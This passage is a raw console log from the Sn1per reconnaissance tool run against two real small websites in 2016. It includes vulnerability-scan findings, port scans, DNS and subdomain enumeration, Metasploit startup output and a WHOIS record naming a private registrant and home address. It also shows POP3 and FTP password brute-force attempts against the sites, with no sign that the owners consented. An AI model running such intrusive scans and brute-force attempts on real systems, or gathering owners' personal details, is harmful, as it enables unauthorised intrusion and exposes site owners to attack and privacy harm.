1332. ./whatweb: /usr/lib/ruby/vendor_ruby/rchardet/universaldetector.rb:39: invalid multibyte escape: /[\x80-\xFF]/ (SyntaxError)
1333.  
1334. __ ______ _____
1335. \ \/ / ___|_ _|
1336. \ /\___ \ | |
1337. / \ ___) || |
1338. /_/\_|____/ |_|
1339.  
1340. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
1341. + -- --=[Target: youstay.co.za:80
1342. + -- --=[Site not vulnerable to Cross-Site Tracing!
1343. + -- --=[Site not vulnerable to Host Header Injection!
1344. + -- --=[Site vulnerable to Cross-Frame Scripting!
1345. + -- --=[Site vulnerable to Clickjacking!
1346.  
1347. HTTP/1.1 405 Not Allowed
1348. Server: nginx/1.10.1
1349. Date: Sun, 10 Jul 2016 21:51:03 GMT
1350. Content-Type: text/html
1351. Content-Length: 173
1352. Connection: close
1353.  
1354. <html>
1355. <head><title>405 Not Allowed</title></head>
1356. <body bgcolor="white">
1357. <center><h1>405 Not Allowed</h1></center>
1358. <hr><center>nginx/1.10.1</center>
1359. </body>
1360. </html>
1361.  
1362. HTTP/1.1 302 Moved Temporarily
1363. Server: nginx/1.10.1
1364. Date: Sun, 10 Jul 2016 21:51:05 GMT
1365. Content-Type: text/html
1366. Content-Length: 0
1367. Connection: keep-alive
1368. Location: /404.html
1369.  
1370.  
1371.  
1372.  
1373.  
1374. ################################### Checking HTTP Headers #########################
1375. + -- --=[Checking if X-Content options are enabled on youstay.co.za...
1376.  
1377. + -- --=[Checking if X-Frame options are enabled on youstay.co.za...
1378.  
1379. + -- --=[Checking if X-XSS-Protection header is enabled on youstay.co.za...
1380.  
1381. + -- --=[Checking HTTP methods on youstay.co.za...
1382.  
1383. + -- --=[Checking if TRACE method is enabled on youstay.co.za...
1384.  
1385. + -- --=[Checking for open proxy on youstay.co.za...
1386. <head>
1387. <meta name="robots" content="noarchive" />
1388. <meta name="googlebot" content="nosnippet" />
1389. </head>
1390. <body>
1391. <div align=center>
1392. <h3>Error. Page cannot be displayed. Please contact your service provider for more details. (26)</h3>
1393. </div>
1394. </body>
1395. </html>
1396. + -- --=[Enumerating software on youstay.co.za...
1397. Server: nginx/1.10.1
1398.  
1399. + -- --=[Checking if Strict-Transport-Security is enabled on youstay.co.za...
1400.  
1401. + -- --=[Checking for Flash cross-domain policy on youstay.co.za...
1402.  
1403. + -- --=[Checking for Silverlight cross-domain policy on youstay.co.za...
1404.  
1405. + -- --=[Checking for HTML5 cross-origin resource sharing on youstay.co.za...
1406.  
1407. + -- --=[Retrieving robots.txt on youstay.co.za...
1408. User-agent: *
1409. Disallow: /
1410.  
1411. + -- --=[Retrieving sitemap.xml on youstay.co.za...
1412.  
1413. + -- --=[Checking cookie attributes on youstay.co.za...
1414.  
1415. + -- --=[Checking for ASP.NET Detailed Errors on youstay.co.za...
1416. <div id="errorcode">ERROR 404 - PAGE NOT FOUND</div>
1417. <p>You may get a 404 error for images because you have Hot Link Protection turned on and the domain is not on the list of authorized domains.</p>
1418. <p>If you go to your temporary url (http://ip/~username/) and get this error, there maybe a problem with the rule set stored in an .htaccess file. You can try renaming that file to .htaccess-backup and refreshing the site to see if that resolves the issue.</p>
1419. <p>Are you using WordPress? See the Section on 404 errors after clicking a link in WordPress.</p>
1420. <p>When you get a 404 error be sure to check the URL that you are attempting to use in your browser.This tells the server what resource it should attempt to request.</p>
1421. <h3><a class="expander" href=#>404 Errors After Clicking WordPress Links</a></h3>
1422. <p>When working with WordPress, 404 Page Not Found errors can often occur when a new theme has been activated or when the rewrite rules in the .htaccess file have been altered.</p>
1423. <p>When you encounter a 404 error in WordPress, you have two options for correcting it.</p>
1424. <li>Test your website to make sure your changes were successfully saved. If not, correct the error or revert back to the previous version until your site works again.</li>
1425. <h3><a href="https://support.hostgator.com/articles/cpanel/custom-error-pages">Want to customize this page?</a></h3>
1426.  
1427.  
1428. ################################### Running Web Vulnerability Scan ################
1429. - Nikto v2.1.6
1430. ---------------------------------------------------------------------------
1431. + Target IP: 50.87.144.166
1432. + Target Hostname: youstay.co.za
1433. + Target Port: 80
1434. + Start Time: 2016-07-11 00:51:17 (GMT3)
1435. ---------------------------------------------------------------------------
1436. + Server: nginx/1.10.1
1437. + The anti-clickjacking X-Frame-Options header is not present.
1438. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
1439. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
1440. + Root page / redirects to: /404.html
1441. + /cgi-sys/formmail.cgi: The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.
1442. + /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
1443. + /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
1444. + OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
1445. + OSVDB-3092: /cgi-sys/entropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww.yourdomain.com/: CPanel's Entropy Search allows username enumeration via the user parameter.
1446. + OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
1447. + OSVDB-3092: /cgi-sys/scgiwrap: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
1448. + OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
1449. + OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
1450. + Server leaks inodes via ETags, header found with file /cgi-bin/c99.php, fields: 0x56a90723 0x16e2
1451. + 9121 requests: 0 error(s) and 13 item(s) reported on remote host
1452. + End Time: 2016-07-11 01:32:33 (GMT3) (2476 seconds)
1453. ---------------------------------------------------------------------------
1454. + 1 host(s) tested
1455. ################################### Saving Web Screenshots ########################
1456. [+] Screenshot saved to /root/Sn1per/loot/youstay.co.za-port80.jpg
1457.  
1458. (cutycapt:13008): Gtk-WARNING **: Theme directory devices/scalable of theme maia has no size field
1459.  
1460. openjdk version "1.8.0_91"
1461. OpenJDK Runtime Environment (build 1.8.0_91-8u91-b14-3-b14)
1462. OpenJDK 64-Bit Server VM (build 25.91-b14, mixed mode)
1463. ################################### Running Google Hacking Queries #############
1464. ################################### Running InUrlBR OSINT Queries ##############
1465.  
1466. _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
1467. (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
1468. (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
1469. \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
1470. \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
1471. /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
1472. [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
1473.  
1474. __[ ! ] Neither war between hackers, nor peace for the system.
1475. __[ ! ] http://blog.inurl.com.br
1476. __[ ! ] http://fb.com/InurlBrasil
1477. __[ ! ] http://twitter.com/@googleinurl
1478. __[ ! ] http://github.com/googleinurl
1479. __[ ! ] Current PHP version::[ 5.6.22-2 ]
1480. __[ ! ] Current script owner::[ root ]
1481. __[ ! ] Current uname::[ Linux anonymous 4.6.0-parrot-amd64 #1 SMP Parrot 4.6.2-2parrot0 (2016-06-29) x86_64 ]
1482. __[ ! ] Current pwd::[ /root/Sn1per ]
1483. __[ ! ] Help: php inurlbr.php --help
1484. ------------------------------------------------------------------------------------------------------------------------
1485.  
1486. [ ! ] Starting SCANNER INURLBR 2.1 at [11-07-2016 01:32:49]
1487. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
1488. It is the end user's responsibility to obey all applicable local, state and federal laws.
1489. Developers assume no liability and are not responsible for any misuse or damage caused by this program
1490.  
1491. [ INFO ][ OUTPUT FILE ]:: [ /root/Sn1per/output/loot/inurlbr-youstay.co.za.txt ]
1492. [ INFO ][ DORK ]::[ site:youstay.co.za ]
1493. [ INFO ][ SEARCHING ]:: {
1494. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.gh ]
1495.  
1496. [ INFO ][ SEARCHING ]::
1497. -[:::]
1498. [ INFO ][ ENGINE ]::[ GOOGLE API ]
1499.  
1500. [ INFO ][ SEARCHING ]::
1501. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
1502. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.ly ID: 002901626849897788481:cpnctza84gq ]
1503.  
1504. [ INFO ][ SEARCHING ]::
1505. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
1506.  
1507. [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
1508. [ INFO ] Not a satisfactory result was found!
1509.  
1510.  
1511. [ INFO ] [ Shutting down ]
1512. [ INFO ] [ End of process INURLBR at [11-07-2016 01:33:08]
1513. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
1514. [ INFO ] [ OUTPUT FILE ]:: [ /root/Sn1per/output/loot/inurlbr-youstay.co.za.txt ]
1515. |_________________________________________________________________________________________
1516.  
1517. \_________________________________________________________________________________________/
1518.  
1519. + -- --=[Port 110 opened... running tests...
1520.  
1521. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-11 01:33 EEST
1522. Nmap scan report for youstay.co.za (50.87.144.166)
1523. Host is up (0.22s latency).
1524. rDNS record for 50.87.144.166: gator3130.hostgator.com
1525. PORT STATE SERVICE VERSION
1526. 110/tcp open pop3 Dovecot pop3d
1527. | pop3-brute:
1528. | Accounts: No valid accounts found
1529. |_ Statistics: Performed 120 guesses in 183 seconds, average tps: 0
1530. |_pop3-capabilities: UIDL PIPELINING SASL(PLAIN LOGIN) USER TOP AUTH-RESP-CODE RESP-CODES CAPA STLS
1531.  
1532. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1533. Nmap done: 1 IP address (1 host up) scanned in 185.26 seconds
1534. + -- --=[Port 111 closed... skipping.
1535. + -- --=[Port 135 closed... skipping.
1536. + -- --=[Port 139 closed... skipping.
1537. + -- --=[Port 162 closed... skipping.
1538. + -- --=[Port 389 closed... skipping.
1539. + -- --=[Port 443 opened... running tests...
1540. ################################### Checking for WAF ##############################
1541.  
1542. ^ ^
1543. _ __ _ ____ _ __ _ _ ____
1544. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1545. | V V // o // _/ | V V // 0 // 0 // _/
1546. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1547. <
1548. ...'
1549.  
1550. WAFW00F - Web Application Firewall Detection Tool
1551.  
1552. By Sandro Gauci && Wendel G. Henrique
1553.  
1554. Checking https://youstay.co.za
1555. The site https://youstay.co.za is behind a ModSecurity (OWASP CRS)
1556. Number of requests: 11
1557.  
1558. ################################### Gathering HTTP Info ###########################
1559. ./whatweb: /usr/lib/ruby/vendor_ruby/rchardet/universaldetector.rb:39: invalid multibyte escape: /[\x80-\xFF]/ (SyntaxError)
1560.  
1561. ################################### Gathering SSL/TLS Info ########################
1562. Version: 1.11.7-static
1563. OpenSSL 1.0.2i-dev xx XXX xxxx
1564.  
1565. Testing SSL server youstay.co.za on port 443
1566.  
1567. TLS Fallback SCSV:
1568. Server supports TLS Fallback SCSV
1569.  
1570. TLS renegotiation:
1571. Secure session renegotiation supported
1572.  
1573. TLS Compression:
1574. Compression disabled
1575.  
1576. Heartbleed:
1577. TLS 1.2 not vulnerable to heartbleed
1578. TLS 1.1 not vulnerable to heartbleed
1579. TLS 1.0 not vulnerable to heartbleed
1580.  
1581. Supported Server Cipher(s):
1582. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
1583. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
1584. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
1585. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
1586. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
1587. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
1588. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
1589. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
1590. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1591. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1592. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
1593. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
1594. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1595. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1596. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
1597. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
1598. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1599. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1600. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
1601. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
1602.  
1603. SSL Certificate:
1604. Signature Algorithm: sha256WithRSAEncryption
1605. RSA Key Strength: 2048
1606.  
1607. Subject: *.hostgator.com
1608. Altnames: DNS:*.hostgator.com, DNS:hostgator.com
1609. Issuer: COMODO RSA Domain Validation Secure Server CA
1610.  
1611. Not valid before: Oct 16 00:00:00 2015 GMT
1612. Not valid after: Oct 15 23:59:59 2018 GMT
1613.  
1614.  
1615.  
1616. AVAILABLE PLUGINS
1617. -----------------
1618.  
1619. PluginCertInfo
1620. PluginOpenSSLCipherSuites
1621. PluginChromeSha1Deprecation
1622. PluginHSTS
1623. PluginSessionResumption
1624. PluginHeartbleed
1625. PluginCompression
1626. PluginSessionRenegotiation
1627.  
1628.  
1629.  
1630. CHECKING HOST(S) AVAILABILITY
1631. -----------------------------
1632.  
1633. youstay.co.za:443 => 50.87.144.166:443
1634.  
1635.  
1636.  
1637. SCAN RESULTS FOR YOUSTAY.CO.ZA:443 - 50.87.144.166:443
1638. ------------------------------------------------------
1639.  
1640. * Deflate Compression:
1641. OK - Compression disabled
1642.  
1643. * Session Renegotiation:
1644. Client-initiated Renegotiations: OK - Rejected
1645. Secure Renegotiation: OK - Supported
1646.  
1647. * Certificate - Content:
1648. SHA1 Fingerprint: 9141b50cee603888dc45f4f285c1c8844fe12221
1649. Common Name: *.hostgator.com
1650. Issuer: COMODO RSA Domain Validation Secure Server CA
1651. Serial Number: 19607DA086E8A7FE72900982CFED93BF
1652. Not Before: Oct 16 00:00:00 2015 GMT
1653. Not After: Oct 15 23:59:59 2018 GMT
1654. Signature Algorithm: sha256WithRSAEncryption
1655. Public Key Algorithm: rsaEncryption
1656. Key Size: 2048 bit
1657. Exponent: 65537 (0x10001)
1658. X509v3 Subject Alternative Name: {'DNS': ['*.hostgator.com', 'hostgator.com']}
1659.  
1660. * Certificate - Trust:
1661. Hostname Validation: FAILED - Certificate does NOT match youstay.co.za
1662. Google CA Store (09/2015): OK - Certificate is trusted
1663. Java 6 CA Store (Update 65): OK - Certificate is trusted
1664. Microsoft CA Store (09/2015): OK - Certificate is trusted
1665. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
1666. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
1667. Certificate Chain Received: ['*.hostgator.com', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
1668.  
1669. * Certificate - OCSP Stapling:
1670. NOT SUPPORTED - Server did not send back an OCSP response.
1671.  
1672. * Session Resumption:
1673. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
1674. With TLS Session Tickets: OK - Supported
1675.  
1676. * SSLV2 Cipher Suites:
1677. Server rejected all cipher suites.
1678.  
1679. * SSLV3 Cipher Suites:
1680. Undefined - An unexpected error happened:
1681. SRP-RSA-3DES-EDE-CBC-SHA error - [Errno 111] Connection refused
1682. PSK-3DES-EDE-CBC-SHA error - [Errno 111] Connection refused
1683. NULL-SHA256 error - [Errno 111] Connection refused
1684. NULL-SHA error - [Errno 111] Connection refused
1685. NULL-MD5 error - [Errno 111] Connection refused
1686. EXP-RC4-MD5 error - [Errno 111] Connection refused
1687. EXP-RC2-CBC-MD5 error - [Errno 111] Connection refused
1688. EXP-EDH-RSA-DES-CBC-SHA error - [Errno 111] Connection refused
1689. EXP-EDH-DSS-DES-CBC-SHA error - [Errno 111] Connection refused
1690. EXP-DES-CBC-SHA error - [Errno 111] Connection refused
1691. EXP-ADH-RC4-MD5 error - [Errno 111] Connection refused
1692. EXP-ADH-DES-CBC-SHA error - [Errno 111] Connection refused
1693. EDH-RSA-DES-CBC-SHA error - [Errno 111] Connection refused
1694. EDH-DSS-DES-CBC3-SHA error - [Errno 111] Connection refused
1695. EDH-DSS-DES-CBC-SHA error - [Errno 111] Connection refused
1696. ECDHE-RSA-NULL-SHA error - [Errno 111] Connection refused
1697. ECDHE-ECDSA-NULL-SHA error - [Errno 111] Connection refused
1698. ECDH-RSA-NULL-SHA error - [Errno 111] Connection refused
1699. ECDH-RSA-DES-CBC3-SHA error - [Errno 111] Connection refused
1700. ECDH-ECDSA-NULL-SHA error - [Errno 111] Connection refused
1701. ECDH-ECDSA-DES-CBC3-SHA error - [Errno 111] Connection refused
1702. DH-RSA-DES-CBC3-SHA error - [Errno 111] Connection refused
1703. DH-RSA-DES-CBC-SHA error - [Errno 111] Connection refused
1704. DH-DSS-DES-CBC3-SHA error - [Errno 111] Connection refused
1705. DH-DSS-DES-CBC-SHA error - [Errno 111] Connection refused
1706. DES-CBC3-SHA error - [Errno 111] Connection refused
1707. DES-CBC-SHA error - [Errno 111] Connection refused
1708. AECDH-NULL-SHA error - [Errno 111] Connection refused
1709. AECDH-DES-CBC3-SHA error - [Errno 111] Connection refused
1710. ADH-DES-CBC3-SHA error - [Errno 111] Connection refused
1711. ADH-DES-CBC-SHA error - [Errno 111] Connection refused
1712.  
1713.  
1714.  
1715. SCAN COMPLETED IN 17.22 S
1716. -------------------------
1717.  
1718. **Target: thegarageblog.co.uk **
1719.  
1720. _________ / _/___ ___ _____
1721. / ___/ __ \ / // __ \/ _ \/ ___/
1722. (__ ) / / // // /_/ / __/ /
1723. /____/_/ /_/___/ .___/\___/_/
1724. /_/
1725.  
1726. + -- --=[http://crowdshield.com
1727. + -- --=[sn1per v1.7 by 1N3
1728.  
1729. ################################### Running recon #################################
1730. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
1731. Server: 8.8.8.8
1732. Address: 8.8.8.8#53
1733.  
1734. Non-authoritative answer:
1735. Name: thegarageblog.co.uk
1736. Address: 192.254.237.91
1737.  
1738. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
1739. thegarageblog.co.uk has address 192.254.237.91
1740. thegarageblog.co.uk mail is handled by 0 thegarageblog.co.uk.
1741.  
1742. Xprobe2 v.0.3 Copyright (c) 2002-2005 [email protected], [email protected], [email protected]
1743.  
1744. [+] Target is thegarageblog.co.uk
1745. [+] Loading modules.
1746. [+] Following modules are loaded:
1747. [x] [1] ping:icmp_ping - ICMP echo discovery module
1748. [x] [2] ping:tcp_ping - TCP-based ping discovery module
1749. [x] [3] ping:udp_ping - UDP-based ping discovery module
1750. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
1751. [x] [5] infogather:portscan - TCP and UDP PortScanner
1752. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
1753. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
1754. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
1755. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
1756. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
1757. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
1758. [x] [12] fingerprint:smb - SMB fingerprinting module
1759. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
1760. [+] 13 modules registered
1761. [+] Initializing scan engine
1762. [+] Running scan engine
1763. [-] ping:tcp_ping module: no closed/open TCP ports known on 192.254.237.91. Module test failed
1764. [-] ping:udp_ping module: no closed/open UDP ports known on 192.254.237.91. Module test failed
1765. [-] No distance calculation. 192.254.237.91 appears to be dead or no ports known
1766. [+] Host: 192.254.237.91 is up (Guess probability: 50%)
1767. [+] Target: 192.254.237.91 is alive. Round-Trip Time: 0.22288 sec
1768. [+] Selected safe Round-Trip Time value is: 0.44577 sec
1769. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
1770. [-] fingerprint:smb need either TCP port 139 or 445 to run
1771. [-] fingerprint:snmp: need UDP port 161 open
1772. [+] Primary guess:
1773. [+] Host 192.254.237.91 Running OS: `��%=V (Guess probability: 96%)
1774. [+] Other guesses:
1775. [+] Host 192.254.237.91 Running OS: `��%=V (Guess probability: 96%)
1776. [+] Host 192.254.237.91 Running OS: `��%=V (Guess probability: 96%)
1777. [+] Host 192.254.237.91 Running OS: `��%=V (Guess probability: 96%)
1778. [+] Host 192.254.237.91 Running OS: `��%=V (Guess probability: 96%)
1779. [+] Host 192.254.237.91 Running OS: `��%=V (Guess probability: 96%)
1780. [+] Host 192.254.237.91 Running OS: `��%=V (Guess probability: 96%)
1781. [+] Host 192.254.237.91 Running OS: `��%=V (Guess probability: 96%)
1782. [+] Host 192.254.237.91 Running OS: `��%=V (Guess probability: 96%)
1783. [+] Host 192.254.237.91 Running OS: `��%=V (Guess probability: 96%)
1784. [+] Cleaning up scan engine
1785. [+] Modules deinitialized
1786. [+] Execution completed.
1787. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
1788.  
1789. ; <<>> DiG 9.10.3-P4-Debian <<>> -x thegarageblog.co.uk
1790. ;; global options: +cmd
1791. ;; Got answer:
1792. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 21865
1793. ;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
1794.  
1795. ;; OPT PSEUDOSECTION:
1796. ; EDNS: version: 0, flags:; udp: 4096
1797. ;; QUESTION SECTION:
1798. ;uk.co.thegarageblog.in-addr.arpa. IN PTR
1799.  
1800. ;; AUTHORITY SECTION:
1801. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2015073991 1800 900 604800 3600
1802.  
1803. ;; Query time: 256 msec
1804. ;; SERVER: 8.8.8.8#53(8.8.8.8)
1805. ;; WHEN: Mon Jul 11 10:15:20 EEST 2016
1806. ;; MSG SIZE rcvd: 129
1807.  
1808.  
1809. Domain name:
1810. thegarageblog.co.uk
1811.  
1812. Registrant:
1813. David Goodman
1814.  
1815. Registrant type:
1816. Unknown
1817.  
1818. Registrant's address:
1819. 17 Blackwater Way
1820. ALDERSHOT
1821. Hampshire
1822. GU12 4DN
1823. United Kingdom
1824.  
1825. Data validation:
1826. Nominet was able to match the registrant's name and address against a 3rd party data source on 10-Dec-2012
1827.  
1828. Registrar:
1829. Namesco Limited [Tag = NAMESCO]
1830. URL: http://www.names.co.uk
1831.  
1832. Relevant dates:
1833. Registered on: 21-Aug-2008
1834. Expiry date: 21-Aug-2016
1835. Last updated: 07-Jan-2014
1836.  
1837. Registration status:
1838. Registered until expiry date.
1839.  
1840. Name servers:
1841. ns1103.hostgator.com
1842. ns1104.hostgator.com
1843.  
1844. WHOIS lookup made at 08:15:21 11-Jul-2016
1845.  
1846. --
1847. This WHOIS information is provided for free by Nominet UK the central registry
1848. for .uk domain names. This information and the .uk WHOIS are:
1849.  
1850. Copyright Nominet UK 1996 - 2016.
1851.  
1852. You may not access the .uk WHOIS or use any data from it except as permitted
1853. by the terms of use available in full at http://www.nominet.uk/whoisterms,
1854. which includes restrictions on: (A) use of the data for advertising, or its
1855. repackaging, recompilation, redistribution or reuse (B) obscuring, removing
1856. or hiding any or all of this notice and (C) exceeding query rate or volume
1857. limits. The data is provided on an 'as-is' basis and may lag behind the
1858. register. Access may be withdrawn or restricted at any time.
1859. Smartmatch is experimental at ./dnsenum.pl line 698.
1860. Smartmatch is experimental at ./dnsenum.pl line 698.
1861. dnsenum.pl VERSION:1.2.4
1862.  
1863. ----- thegarageblog.co.uk -----
1864.  
1865.  
1866. Host's addresses:
1867. __________________
1868.  
1869. thegarageblog.co.uk. 14394 IN A 192.254.237.91
1870.  
1871.  
1872. Name Servers:
1873. ______________
1874.  
1875. ns1104.hostgator.com. 43193 IN A 192.254.186.42
1876. ns1103.hostgator.com. 43193 IN A 192.254.190.45
1877.  
1878.  
1879. Mail (MX) Servers:
1880. ___________________
1881.  
1882. thegarageblog.co.uk. 14393 IN A 192.254.237.91
1883.  
1884.  
1885. Trying Zone Transfers and getting Bind Versions:
1886. _________________________________________________
1887.  
1888.  
1889. Trying Zone Transfer for thegarageblog.co.uk on ns1104.hostgator.com ...
1890. AXFR record query failed: REFUSED
1891.  
1892. Trying Zone Transfer for thegarageblog.co.uk on ns1103.hostgator.com ...
1893. AXFR record query failed: REFUSED
1894.  
1895. brute force file not specified, bay.
1896.  
1897. ____ _ _ _ _ _____
1898. / ___| _ _| |__ | (_)___| |_|___ / _ __
1899. \___ \| | | | '_ \| | / __| __| |_ \| '__|
1900. ___) | |_| | |_) | | \__ \ |_ ___) | |
1901. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
1902.  
1903. # Fast Subdomains Enumeration tool using Search Engines and BruteForce
1904. # Coded By Ahmed Aboul-Ela - @aboul3la
1905. # Special Thanks to Ibrahim Mosaad - @ibrahim_mosaad for his contributions
1906.  
1907. [-] Enumerating subdomains now for thegarageblog.co.uk
1908. [-] verbosity is enabled, will show the subdomains results in realtime
1909. [-] Searching now in Baidu..
1910. [-] Searching now in Yahoo..
1911. [-] Searching now in Google..
1912. [-] Searching now in Bing..
1913. [-] Searching now in Ask..
1914. [-] Searching now in Netcraft..
1915. [-] Searching now in DNSdumpster..
1916.  
1917. ################################### Pinging host ###################################
1918. PING thegarageblog.co.uk (192.254.237.91) 56(84) bytes of data.
1919. 64 bytes from 192.254.237.91 (192.254.237.91): icmp_seq=1 ttl=51 time=223 ms
1920.  
1921. --- thegarageblog.co.uk ping statistics ---
1922. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
1923. rtt min/avg/max/mdev = 223.064/223.064/223.064/0.000 ms
1924.  
1925. ################################### Running TCP port scan ##########################
1926.  
1927. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-11 10:16 EEST
1928. Nmap scan report for thegarageblog.co.uk (192.254.237.91)
1929. Host is up (0.23s latency).
1930. Not shown: 23 closed ports, 6 filtered ports
1931. PORT STATE SERVICE
1932. 21/tcp open ftp
1933. 25/tcp open smtp
1934. 80/tcp open http
1935. 110/tcp open pop3
1936. 443/tcp open https
1937. 3306/tcp open mysql
1938. 8080/tcp open http-proxy
1939. 8443/tcp open https-alt
1940.  
1941. Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds
1942. ################################### Running UDP port scan ##########################
1943.  
1944. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-11 10:16 EEST
1945. WARNING: a TCP scan type was requested, but no tcp ports were specified. Skipping this scan type.
1946. Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds
1947.  
1948. ################################### Running Intrusive Scans ########################
1949. + -- --=[Port 21 opened... running tests...
1950.  
1951. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-11 10:16 EEST
1952. Nmap scan report for thegarageblog.co.uk (192.254.237.91)
1953. Host is up (0.22s latency).
1954. PORT STATE SERVICE VERSION
1955. 21/tcp open ftp Pure-FTPd
1956. | ftp-brute:
1957. | Accounts: No valid accounts found
1958. | Statistics: Performed 16 guesses in 66 seconds, average tps: 0
1959. |_ ERROR: Too many retries, aborted ...
1960.  
1961. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1962. Nmap done: 1 IP address (1 host up) scanned in 67.55 seconds
1963.  
1964. IIIIII dTb.dTb _.---._
1965. II 4' v 'B .'"".'/|\`.""'.
1966. II 6. .P : .' / | \ `. :
1967. II 'T;. .;P' '.' / | \ `.'
1968. II 'T; ;P' `. / | \ .'
1969. IIIIII 'YvP' `-.__|__.-'
1970.  
1971. I love shells --egypt
1972.  
1973.  
1974. Taking notes in notepad? Have Metasploit Pro track & report
1975. your progress and findings -- learn more on http://rapid7.com/metasploit
1976.  
1977. =[ metasploit v4.12.7-dev ]
1978. + -- --=[ 1551 exploits - 898 auxiliary - 267 post ]
1979. + -- --=[ 438 payloads - 38 encoders - 8 nops ]
1980. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
1981.  
1982. RHOST => thegarageblog.co.uk
1983. RHOSTS => thegarageblog.co.uk
1984. [*] thegarageblog.co.uk:21 - Banner: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
1985. 220-You are user number 6 of 150 allowed.
1986. 220-Local time is now 02:17. Server port: 21.
1987. 220-IPv6 connections are also welcome on this server.
